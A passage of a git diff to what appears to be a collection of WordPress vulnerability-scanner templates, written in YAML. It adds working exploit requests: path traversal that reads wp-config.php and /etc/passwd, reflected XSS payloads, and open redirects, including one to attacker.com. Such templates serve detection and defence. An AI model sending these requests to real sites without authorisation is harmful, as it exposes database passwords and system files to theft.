method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index 4b8b194cfc..376ae78efd 100644 --- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. - reference: https://cxsecurity.com/issue/WLB-2020030183 + reference: + - https://cxsecurity.com/issue/WLB-2020030183 tags: wordpress,wp-theme,redirect requests: diff --git a/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml new file mode 100644 index 0000000000..0a91138dfb --- /dev/null +++ b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml @@ -0,0 +1,48 @@ +id: elex-woocommerce-xss + +info: + name: WordPress WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting + author: dhiyaneshDk + severity: high + description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and + executing it in a logged in admin context. + reference: + - https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: wordpress,wp-plugin,xss,authenticated,woocommerce + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/feedwordpress-xss.yaml b/vulnerabilities/wordpress/feedwordpress-xss.yaml new file mode 100644 index 0000000000..20cc24cc81 --- /dev/null +++ b/vulnerabilities/wordpress/feedwordpress-xss.yaml @@ -0,0 +1,41 @@ +id: feedwordpress-xss + +info: + name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter. + reference: + - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 + tags: wordpress,wp-plugin,xss,feedwordpress,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">" method="post">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index 19cfc73b7b..af1015d333 100644 --- a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -1,7 +1,7 @@ id: flow-flow-social-stream-xss info: - name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS + name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting author: alph4byt3 severity: medium reference: diff --git a/vulnerabilities/wordpress/hb-audio-lfi.yaml b/vulnerabilities/wordpress/hb-audio-lfi.yaml new file mode 100644 index 0000000000..4a0e7ea744 --- /dev/null +++ b/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -0,0 +1,29 @@ +id: hb-audio-lfi + +info: + name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval + author: dhiyaneshDK + severity: high + reference: + - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html + metadata: + google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/health-check-lfi.yaml b/vulnerabilities/wordpress/health-check-lfi.yaml new file mode 100644 index 0000000000..c6e1a39f3c --- /dev/null +++ b/vulnerabilities/wordpress/health-check-lfi.yaml @@ -0,0 +1,45 @@ +id: health-check-lfi + +info: + name: Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal + author: DhiyaneshDK + severity: high + description: The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability. + remediation: Fixed in version 1.2.4 + reference: + - https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a + - https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf + tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=health-check-view-file-diff&file=../../../../../../etc/passwd + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml b/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml new file mode 100644 index 0000000000..003dee02ce --- /dev/null +++ b/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml @@ -0,0 +1,35 @@ +id: hide-security-enhancer-lfi + +info: + name: WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion + author: dhiyaneshDK + severity: high + description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. + reference: + - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + remediation: Upgrade to version 1.4 or later. + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/29 diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml index d2ecd930f2..46a775efd6 100644 --- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -1,11 +1,17 @@ id: issuu-panel-lfi info: - name: Wordpress Plugin Issuu Panel - RFI & LFI + name: Wordpress Plugin Issuu Panel Remote/Local File Inclusion author: 0x_Akoko severity: high description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files. - reference: https://cxsecurity.com/issue/WLB-2016030131 + reference: + - https://cxsecurity.com/issue/WLB-2016030131 + - https://wordpress.org/plugins/issuu-panel/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: wp-plugin,wordpress,lfi,rfi requests: @@ -23,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/29 diff --git a/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/vulnerabilities/wordpress/mthemeunus-lfi.yaml new file mode 100644 index 0000000000..bb1b5770e5 --- /dev/null +++ b/vulnerabilities/wordpress/mthemeunus-lfi.yaml @@ -0,0 +1,29 @@ +id: mthemeunus-lfi + +info: + name: mTheme-Unus Theme - Local File Inclusion (LFI) + author: dhiyaneshDk + severity: high + description: The mTheme-Unus WordPress Theme was affected by a css.php Local File Inclusion security vulnerability. + reference: + - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb + - https://packetstormsecurity.com/files/133778/ + tags: wordpress,wp-theme,lfi,wordpress,mtheme + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/music-store-open-redirect.yaml b/vulnerabilities/wordpress/music-store-open-redirect.yaml new file mode 100644 index 0000000000..762915a8cd --- /dev/null +++ b/vulnerabilities/wordpress/music-store-open-redirect.yaml @@ -0,0 +1,24 @@ +id: music-store-open-redirect + +info: + name: Music Store <= 1.0.14 - Referer Header Open Redirect + author: dhiyaneshDk + severity: medium + description: The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. + reference: + - https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1 + - https://seclists.org/fulldisclosure/2015/Jul/113 + tags: wordpress,redirect,wp-plugin,musicstore,wp + +requests: + - raw: + - | + GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 + Host: {{Hostname}} + Referer: https://example.com + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/wordpress/my-chatbot-xss.yaml b/vulnerabilities/wordpress/my-chatbot-xss.yaml new file mode 100644 index 0000000000..adb3a0d840 --- /dev/null +++ b/vulnerabilities/wordpress/my-chatbot-xss.yaml @@ -0,0 +1,47 @@ +id: my-chatbot-xss + +info: + name: WordPress My Chatbot <= 1.1 - Reflected Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: WordPress My Chatbot <= 1.1 is susceptible to cross-site scripting. The plugin does not sanitize or escape its tab parameter in the Settings page before outputting it back in an attribute. + reference: + - https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: wordpress,wp-plugin,xss,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index eba8ffcbf7..6f1dfbf9fe 100644 --- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -1,11 +1,12 @@ id: nativechurch-wp-theme-lfd info: - name: WordPress NativeChurch Theme Arbitrary File Download + name: WordPress NativeChurch Theme - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. - reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html + description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. + reference: + - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html tags: wordpress,wp-theme,lfi requests: diff --git a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml new file mode 100644 index 0000000000..2b65920e1e --- /dev/null +++ b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml @@ -0,0 +1,24 @@ +id: newsletter-manager-open-redirect + +info: + name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect + author: akincibor + severity: low + description: | + The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ==" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-open-redirect.yaml new file mode 100644 index 0000000000..2960aceaa6 --- /dev/null +++ b/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -0,0 +1,26 @@ +id: newsletter-open-redirect + +info: + name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect + author: dhiyaneshDk + severity: medium + description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the + header() PHP function, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 + classification: + cwe-id: CWE-601 + tags: wordpress,redirect,wp-plugin,newsletter,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/ninjaform-open-redirect.yaml b/vulnerabilities/wordpress/ninjaform-open-redirect.yaml new file mode 100644 index 0000000000..3431d9da92 --- /dev/null +++ b/vulnerabilities/wordpress/ninjaform-open-redirect.yaml @@ -0,0 +1,35 @@ +id: ninjaform-open-redirect + +info: + name: Ninja Forms < 3.4.34 - Administrator Open Redirect + author: dhiyaneshDk,daffainfo + severity: low + description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place. + reference: + - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818 + tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302' + - 'status_code_2 == 302' + - "contains(all_headers_2, 'Location: https://example.com?client_id=1')" + condition: and diff --git a/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/vulnerabilities/wordpress/pieregister-open-redirect.yaml new file mode 100644 index 0000000000..1696507595 --- /dev/null +++ b/vulnerabilities/wordpress/pieregister-open-redirect.yaml @@ -0,0 +1,26 @@ +id: pieregister-open-redirect + +info: + name: WordPress Pie Register < 3.7.2.4 - Open Redirect + author: 0x_Akoko + severity: low + description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + reference: + - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + - https://wordpress.org/plugins/pie-register/ + classification: + cwe-id: CWE-601 + tags: wordpress,redirect,wp-plugin,pieregister + +requests: + - method: GET + path: + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml index e9acae08cf..8d425c291c 100644 --- a/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/vulnerabilities/wordpress/sassy-social-share.yaml @@ -1,11 +1,11 @@ id: sassy-social-share-xss info: - name: Sassy Social Share XSS + name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting author: Random_Robbie severity: medium - description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS) - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,sassy,xss + requests: - method: GET path: @@ -14,13 +14,19 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '[{"":""}]' - 'facebook' - 'twitter' - part: body condition: and + - type: word + part: header + words: + - 'application/json' + negative: true + - type: status status: - 200 \ No newline at end of file diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml new file mode 100644 index 0000000000..41362a0a81 --- /dev/null +++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -0,0 +1,54 @@ +id: seo-redirection-xss + +info: + name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue. + remediation: Fixed in version 7.4. + reference: + - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea + tags: wordpress,xss,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E + + - | + GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "settings_page_seo-redirection" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/shortcode-lfi.yaml b/vulnerabilities/wordpress/shortcode-lfi.yaml new file mode 100644 index 0000000000..1bd28a766b --- /dev/null +++ b/vulnerabilities/wordpress/shortcode-lfi.yaml @@ -0,0 +1,31 @@ +id: shortcode-lfi + +info: + name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3) + author: dhiyaneshDK + severity: high + description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain + sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected. + reference: + - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html + metadata: + google-dork: inurl:wp/wp-content/force-download.php + tags: wordpress,wp-plugin,lfi,shortcode,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml b/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml new file mode 100644 index 0000000000..a58df73c46 --- /dev/null +++ b/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml @@ -0,0 +1,25 @@ +id: simple-image-manipulator-lfi + +info: + name: Simple Image Manipulator v1.0 - Remote file download + author: dhiyaneshDK + severity: high + description: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location. + reference: + - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/sniplets-lfi.yaml b/vulnerabilities/wordpress/sniplets-lfi.yaml new file mode 100644 index 0000000000..757dff08fe --- /dev/null +++ b/vulnerabilities/wordpress/sniplets-lfi.yaml @@ -0,0 +1,27 @@ +id: sniplets-lfi + +info: + name: Wordpress Plugin Sniplets 1.1.2 - LFI + author: dhiyaneshDK + severity: high + reference: + - https://www.exploit-db.com/exploits/5194 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/sniplets-xss.yaml b/vulnerabilities/wordpress/sniplets-xss.yaml new file mode 100644 index 0000000000..195e8e384f --- /dev/null +++ b/vulnerabilities/wordpress/sniplets-xss.yaml @@ -0,0 +1,31 @@ +id: sniplets-xss + +info: + name: Wordpress Plugin Sniplets - Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets + reference: + - https://www.exploit-db.com/exploits/5194 + tags: xss,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 55110ec907..ba75da6fa4 100644 --- a/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: medium description: The Ultimate Member WordPress plugin was vulnerable to an Unauthenticated Open Redirect vulnerability, affecting the registration and login pages where the "redirect_to" GET parameter was used. - reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f + reference: + - https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f tags: wp-plugin,redirect,wordpress requests: diff --git a/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml new file mode 100644 index 0000000000..4e25b1b4b0 --- /dev/null +++ b/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml @@ -0,0 +1,25 @@ +id: video-synchro-pdf-lfi + +info: + name: Videos sync PDF 1.7.4 - Unauthenticated Local File Inclusion + author: Hassan Khan Yusufzai - Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50844 + - https://wordpress.org/plugins/video-synchro-pdf/ + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml index 8dda442e3f..5c7fdc88b3 100644 --- a/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml +++ b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml @@ -1,13 +1,14 @@ id: w3c-total-cache-ssrf + info: name: Wordpress W3C Total Cache SSRF <= 0.9.4 author: random_robbie severity: medium - tags: wordpress,wp-plugin description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html + tags: wordpress,wp-plugin,cache,ssrf requests: - method: GET @@ -17,4 +18,4 @@ requests: - type: word words: - "NessusFileIncludeTest" - part: body \ No newline at end of file + part: body diff --git a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index c7641f841a..abbcd5095b 100644 --- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. - reference: https://cxsecurity.com/issue/WLB-2020040103 + reference: + - https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect requests: diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 226a87797b..efb3cccd26 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -1,9 +1,14 @@ id: wordpress-accessible-wpconfig + info: - name: WordPress accessible wp-config + name: WordPress wp-config Detection author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n - severity: high - description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading. + severity: medium + description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: wordpress,backup requests: @@ -43,3 +48,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml index 47348a7a21..9edd719f2c 100644 --- a/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml +++ b/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml @@ -1,10 +1,10 @@ id: wordpress-affiliatewp-log info: - name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure + name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure author: dhiyaneshDK severity: low - tags: wordpress,log + tags: wordpress,log,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml index 2404e9dcb9..fd1ae9b37e 100644 --- a/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK severity: info description: Searches for sensitive directories present in the bbpress wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6158 - tags: wordpress,listing + reference: + - https://www.exploit-db.com/ghdb/6158 + tags: wordpress,listing,plugin requests: - method: GET diff --git a/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml b/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml index ed40dd3432..3f1e03ab8f 100644 --- a/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml +++ b/vulnerabilities/wordpress/wordpress-elementor-plugin-listing.yaml @@ -5,8 +5,9 @@ info: author: dhiyaneshDK 